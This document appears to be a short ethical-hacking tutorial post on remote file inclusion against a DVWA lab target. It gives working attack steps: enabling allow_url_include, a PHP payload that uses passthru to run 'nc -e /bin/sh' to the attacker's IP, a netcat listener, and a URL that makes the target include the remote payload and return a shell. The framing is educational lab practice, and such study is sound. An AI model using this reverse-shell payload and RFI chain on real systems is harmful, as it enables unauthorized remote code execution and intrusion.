Ethical Hacking - Web Penetration Testing(6)

REMOTE FILE INCLUSION

• Similar to local file inclusion.
• But allows an attacker to read ANY file from ANY server.
• Execute PHP files from other servers on the current server.
• Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

 Restart web service

Create a local php file on /var/www/html.

<?php
passthru("nc -e /bin/sh 10.0.0.13 8080");
?>

Execute the NC command to wait for connection.

nc -vv -l -p 8080

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

 We connect to the target machine successfully.

Ethical Hacking - Web Penetration Testing(6)

原文：https://www.cnblogs.com/keepmoving1113/p/12274844.html